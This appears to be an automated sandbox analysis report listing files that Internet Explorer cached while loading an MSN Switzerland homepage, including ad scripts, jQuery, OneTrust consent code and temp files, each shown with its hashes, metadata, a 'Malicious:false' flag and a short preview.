                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\a5ea21[1].ico
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):758
                                                                                                                                                                                                                                                          Entropy (8bit):7.432323547387593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
                                                                                                                                                                                                                                                          MD5:84CC977D0EB148166481B01D8418E375
                                                                                                                                                                                                                                                          SHA1:00E2461BCD67D7BA511DB230415000AEFBD30D2D
                                                                                                                                                                                                                                                          SHA-256:BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
                                                                                                                                                                                                                                                          SHA-512:F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                                                                                                                                                                                                                                                          Preview: .PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\de-ch[1].htm
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):428045
                                                                                                                                                                                                                                                          Entropy (8bit):5.438653717131425
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:dJxJUQxx++staF6g90GtUdyKcnvphvMx/8nomxWjY4hWfvuJiLt:dJx7O+PEx/8nBWjphW3uJM
                                                                                                                                                                                                                                                          MD5:9AD43F87147A5524E5D45E2A7B7478FE
                                                                                                                                                                                                                                                          SHA1:804A551F06A216ADCAA77B41949AAF16CE270FD4
                                                                                                                                                                                                                                                          SHA-256:C73F26EC93B18E381057222B7B4491FA811F091639E7C3D7D943D1C3E3030657
                                                                                                                                                                                                                                                          SHA-512:3CB0FDF0358CDCA43A79AD655A2AC55FCF3313E4289056B6EECA782AD3076F0BEFF9D1907312E0E1A6328790E2FDAA5E3ADB513CF2FD1AB5F4D9E63FD347A3A9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview: <!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20210208_31257824;a:fe97b5b9-dd8e-4789-9b42-f75f1a907c33;cn:9;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 9, sn: neurope-prod-hp, dt: 2021-02-02T23:02:05.5135507Z, bt: 2021-02-08T21:20:57.5642255Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-01-12 22:59:27Z;xdmap:2021-02-10 06:59:32Z;axd:;f:msnallexpusers,muidflt21cf,muidflt47cf,muidflt48cf,muidflt52cf,muidflt56cf,muidflt58cf,muidflt259cf,mmxandroid1cf,pneedge3cf,startedge1cf,pnehp1cf,starthp3cf,tokenblockgc,bingcollabhp3cf,compliancehz1cf,artgly2cf,onetrustpoplive,anaheim1cf,msnapp3cf,1s-bing-news,vebudumu04302020,bbh20200521msncf,shophp2cf,weather3cf,prong1aac,prg-gitconfigs-t11;userOptOut:false;userOptOutOptions:" data-js="{&quot;dpi&quot;:1.0,&quot;ddpi&quot;
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\dnserror[1]
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):2997
                                                                                                                                                                                                                                                          Entropy (8bit):4.4885437940628465
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                                                                                                                                                                                                                                          MD5:2DC61EB461DA1436F5D22BCE51425660
                                                                                                                                                                                                                                                          SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                                                                                                                                                                                                                                          SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                                                                                                                                                                                                                                          SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0005&DNSError=9002
                                                                                                                                                                                                                                                          Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\down[1]
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):748
                                                                                                                                                                                                                                                          Entropy (8bit):7.249606135668305
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                                                                                                          MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                                                                                                          SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                                                                                                          SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                                                                                                          SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:res://ieframe.dll/down.png
                                                                                                                                                                                                                                                          Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\fcmain[1].js
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):38320
                                                                                                                                                                                                                                                          Entropy (8bit):5.063683959681166
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:y1avn4u3hPPeW94h82seSB1fYXf9wOBEZn3SQN3GFl295ovYlseBJYlWsEi:2Qn4uROWmh82sewfYXf9wOBEZn3SQN3m
                                                                                                                                                                                                                                                          MD5:295F8EA8B161939487E95AF2A9E0A121
                                                                                                                                                                                                                                                          SHA1:ECEB4C9F392443AE7C56FF30EAD9EEB52A391A99
                                                                                                                                                                                                                                                          SHA-256:4C5169F9C3CA994E1DFBCB84D89991247A35F8C511A71CCF10339B7C39DE8893
                                                                                                                                                                                                                                                          SHA-512:1D32D7A44945881069ADFB2E4EB90BF59F4BA8D753DDBDB35B3B49FB01C6E98FBC4C2603E4530E2A7BD90FFB3263F700B9382C57D3299CC9509C19A6CC4B8106
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=722878611&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1612940401242457989&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
                                                                                                                                                                                                                                                          Preview: ;window._mNDetails.initAd({"vi":"1612940401242457989","s":{"_mNL2":{"size":"306x271","viComp":"1612938895580889459","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2887305228","l2ac":""},"_mNe":{"pid":"8PO641UYD","requrl":"https://www.msn.com/de-ch/?ocid=iehp#mnetcrid=722878611#"},"_md":[],"ac":{"content":"<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\r\n<head><meta http-equiv=\"x-dns-prefetch-control\" content=\"on\"><style type=\"text\/css\">body{background-color: transparent;}<\/style><meta name=\"tids\" content=\"a='800072941' b='803767816' c='msn.com' d='entity type'\" \/><script type=\"text\/javascript\">try{window.locHash = (parent._mNDetails && parent._mNDetails.getLocHash && parent._mNDetails.getLocHash(\"722878611\",\"1612940401242457989\")) || (parent._mNDetails[\"locHash\"] && parent._mNDetails[\"locHash\
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\fcmain[2].js
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):38565
                                                                                                                                                                                                                                                          Entropy (8bit):5.055277906516546
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:R1av44u3hPPNW94haSrEw2xYXf9wOBEZn3SQN3GFl295oAlYst/1lYRsA:jQ44uR9WmhaSYw2xYXf9wOBEZn3SQN3o
                                                                                                                                                                                                                                                          MD5:02F1DD6FB3A049F26DFDC96DE257D87E
                                                                                                                                                                                                                                                          SHA1:BD089F5CDF4037A3513017EA91642249BF880389
                                                                                                                                                                                                                                                          SHA-256:6F0768238B0560DED670AC18DEB757330634826CFDEF9FA68B9E83F2E320EBA3
                                                                                                                                                                                                                                                          SHA-512:1C740B53088D9807EA604108E481DE6C7C703D1FABA21D2B5774511FCA04FFE6F914C65BF4BF65DD1E075877AB7FF7428017B49571E9FFA98F0164A9FEDA2AF3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=858412214&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1612940401882162969&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
                                                                                                                                                                                                                                                          Preview: ;window._mNDetails.initAd({"vi":"1612940401882162969","s":{"_mNL2":{"size":"306x271","viComp":"1612937067206000422","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2886934051","l2ac":""},"_mNe":{"pid":"8PO8WH2OT","requrl":"https://www.msn.com/de-ch/?ocid=iehp#mnetcrid=858412214#"},"_md":[],"ac":{"content":"<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\r\n<head><meta http-equiv=\"x-dns-prefetch-control\" content=\"on\"><style type=\"text\/css\">body{background-color: transparent;}<\/style><meta name=\"tids\" content=\"a='800072941' b='803767816' c='msn.com' d='entity type'\" \/><script type=\"text\/javascript\">try{window.locHash = (parent._mNDetails && parent._mNDetails.getLocHash && parent._mNDetails.getLocHash(\"858412214\",\"1612940401882162969\")) || (parent._mNDetails[\"locHash\"] && parent._mNDetails[\"locHash\
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\https___native-images.s3.amazonaws.com_4a095e64b94cb28ba588966b288bc14e[1].jpg
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):15982
                                                                                                                                                                                                                                                          Entropy (8bit):7.961610031508371
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:XF3Cf9gICk/Be6TQkdoGH6sksSfkmFuP/8wYICd2yGAcM7i+5uN:sFA8B7TQ9GH6sk2V85dYAcAuN
                                                                                                                                                                                                                                                          MD5:47789F772F51E2D1C55F93FF02A46F0E
                                                                                                                                                                                                                                                          SHA1:46FDA1B7D0A7870D2804B8FF3A8A70DE46C60051
                                                                                                                                                                                                                                                          SHA-256:EE4FF31C092895109F1BC8BDE0D93585EDD49C27A1F01E0E2D7584E4DAA2141A
                                                                                                                                                                                                                                                          SHA-512:40898DE87B1A34A687B358BC67FDD726C5A76EC9758EDAA92FD8C3CB2333576ECE041AAC88C825D3D0484F6066F7C5280261BF0635179E3F636FA4EEA582A5A4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fnative-images.s3.amazonaws.com%2F4a095e64b94cb28ba588966b288bc14e.jpeg
                                                                                                                                                                                                                                                          Preview: ......JFIF.............C....................................!*$..( ..%2%(,-/0/.#484.7*./....C.......!..!E.'.EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE......7..........................................................................................YG".f.....+F.+...l....c..Q..V\.vH..V@.eA.1....X#'...j...G.......\3.d...,.[..`k.6ia../.&,..V.z...............Ib.r..*:oV~..*|.Q.H....4...5.... j.[iK.[..'....S./............lY.'.g..~...4.n..%.....X.w....S....YS.]S.k.#..O.i..'...].a76.MZ-....|.8WNsT4....].C.....h.r..a.}......{...To9...BC.E46.y..AF..~.....J........C.w..ww.tS|....T..4<.......#.9~...4..1.....,..o.3..O"f..3k...,.:..}..q.b.%|.=W...u5.:h...0.w.....|......ts.wL.X-5..[o5#8.X1.8....wQo&4u.......3...|..i..J....H.....z;.[..z....<t..*.@..(:ST...u..fV.8..>..x........._.[.......,..}..yq..~....Pu....~M5e...3....G..=...p..s..T.....c..D.f.o#X..A.+K..j..Q.q.1..GS]qL...y...1....v...6.=.....u..y..;u....s.......YjU..G.+.Aq.....>...h...x._Yp....8..
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\iab2Data[1].json
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):230026
                                                                                                                                                                                                                                                          Entropy (8bit):5.150044456837813
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:l3JqIWtk5N1cfkCHGd5btLkWUuSKQlqmPTZ1j5sIbUkjsyYAAA:l3JqIGk5Med5btLksSKkPnjNjh4A
                                                                                                                                                                                                                                                          MD5:6AAA0F3074990A455B222A4D044E2346
                                                                                                                                                                                                                                                          SHA1:6443AF82ED596527261B0F4367A67DD4D1BA855B
                                                                                                                                                                                                                                                          SHA-256:1232E273F047113AB950CC141FC73D50640D2352B2ED16B89A1BAC01A80BEBEC
                                                                                                                                                                                                                                                          SHA-512:EDE13CDE1DDEB45CD038042DCC6C1F75664EC259BC44100EB9C36361CFB657A7A661901DFEAD44DF6CEC555406A221970DF10F562AE222226546B7EFCE8E6E8D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json
                                                                                                                                                                                                                                                          Preview: {"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\jquery-2.1.1.min[1].js
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):84249
                                                                                                                                                                                                                                                          Entropy (8bit):5.369991369254365
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
                                                                                                                                                                                                                                                          MD5:9A094379D98C6458D480AD5A51C4AA27
                                                                                                                                                                                                                                                          SHA1:3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
                                                                                                                                                                                                                                                          SHA-256:B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
                                                                                                                                                                                                                                                          SHA-512:4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquery-2.1.1.min.js
                                                                                                                                                                                                                                                          Preview: /*! jQuery v2.1.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\otBannerSdk[1].js
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):353215
                                                                                                                                                                                                                                                          Entropy (8bit):5.298793785430684
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:BpqAkqNs7z+NwHr5GR74A+x8sP/An4bb4yxL/Z8NdWRHnoVVMyDkpZ:B0C8zZ5G+x8sP/Ani4yxDAdWRHoVVAZ
                                                                                                                                                                                                                                                          MD5:9982BA07340077CE7240B75C6C6FCBB4
                                                                                                                                                                                                                                                          SHA1:D776E39E13F151C5ED2F7E5761EDE13D9CC72D27
                                                                                                                                                                                                                                                          SHA-256:87C99BCF98F3DA7D1429DAC8184E3212634B65706CE7740CE940D1553B57DAAA
                                                                                                                                                                                                                                                          SHA-512:3EEB895128D38BBBE4FDE8CD71B4FC563C38FFA2F1BCBB3A323D280B4812B0B111DEC1D745BE8EE8F792F7977978FFF03BB00C795C3F5CAFE6E62B3EDF2E88FD
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk.js
                                                                                                                                                                                                                                                          Preview: /** .. * onetrust-banner-sdk.. * v6.7.0.. * by OneTrust LLC.. * Copyright 2020 .. */..!function () { "use strict"; var o = function (e, t) { return (o = Object.setPrototypeOf || { __proto__: [] } instanceof Array && function (e, t) { e.__proto__ = t } || function (e, t) { for (var o in t) t.hasOwnProperty(o) && (e[o] = t[o]) })(e, t) }; var r = function () { return (r = Object.assign || function (e) { for (var t, o = 1, n = arguments.length; o < n; o++)for (var r in t = arguments[o]) Object.prototype.hasOwnProperty.call(t, r) && (e[r] = t[r]); return e }).apply(this, arguments) }; function l(s, i, a, l) { return new (a = a || Promise)(function (e, t) { function o(e) { try { r(l.next(e)) } catch (e) { t(e) } } function n(e) { try { r(l.throw(e)) } catch (e) { t(e) } } function r(t) { t.done ? e(t.value) : new a(function (e) { e(t.value) }).then(o, n) } r((l = l.apply(s, i || [])).next()) }) } function k(o, n) { var r, s, i, e, a = { label: 0, sent: function () { if (1 & i[0]) throw i[1]
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\otTCF-ie[1].js
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):102879
                                                                                                                                                                                                                                                          Entropy (8bit):5.311489377663803
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:ONkWT0m7r8N1qpPVsjvB6z4Yj3RCjnugKtLEdT8xJORONTMC5GkkJ0XcJGk58:8kunecpuj5QRCjnrKxJg0TMC5ZW8
                                                                                                                                                                                                                                                          MD5:52F29FAC6C1D2B0BAC8FE5D0AA2F7A15
                                                                                                                                                                                                                                                          SHA1:D66C777DA4B6D1FEE86180B2B45A3954AE7E0AED
                                                                                                                                                                                                                                                          SHA-256:E497A9E7A9620236A9A67F77D2CDA1CC9615F508A392ECCA53F63D2C8283DC0E
                                                                                                                                                                                                                                                          SHA-512:DF33C49B063AEFD719B47F9335A4A7CE38FA391B2ADF5ACFD0C3FE891A5D0ADDF1C3295E6FF44EE08E729F96E0D526FFD773DC272E57C3B247696B79EE1168BA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
                                                                                                                                                                                                                                                          Preview: !function(){"use strict";var c="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function e(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function t(e,t){return e(t={exports:{}},t.exports),t.exports}function n(e){return e&&e.Math==Math&&e}function p(e){try{return!!e()}catch(e){return!0}}function E(e,t){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:t}}function o(e){return w.call(e).slice(8,-1)}function u(e){if(null==e)throw TypeError("Can't call method on "+e);return e}function l(e){return I(u(e))}function f(e){return"object"==typeof e?null!==e:"function"==typeof e}function i(e,t){if(!f(e))return e;var n,r;if(t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;if("function"==typeof(n=e.valueOf)&&!f(r=n.call(e)))return r;if(!t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;throw TypeError("Can't convert object to primitive value")}function y(e,t){retur
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DF080BC86583B171C3.TMP
                                                                                                                                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):29989
                                                                                                                                                                                                                                                          Entropy (8bit):0.3301261304441037
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwz9lwz9l29/9l2F9lak:kBqoxKAuvScS+Mq9+cdy
                                                                                                                                                                                                                                                          MD5:917EAD8389A8713C7B247A388EAD9B81
                                                                                                                                                                                                                                                          SHA1:1254D63D7B3E8D2876BBEDB9F3C69834B3C639D1
                                                                                                                                                                                                                                                          SHA-256:F3AEDB756751C46D382AC9C6C4058C093DD438643E30A0C54CBC3F260996ED7E
                                                                                                                                                                                                                                                          SHA-512:C10DC541CFEEF998AE231BFF1EBCC58283A4A8456F221C7B03B5166B621BB1976189E5DCF12AE05954D0766BED013D37782B25E6D2B14A4CEACE6EFBE227385E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DF17DD12A14CEE3B99.TMP
                                                                                                                                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):13557
                                                                                                                                                                                                                                                          Entropy (8bit):0.7669064096218048
                                                                                                                                                                                                                                                          Encrypted:false
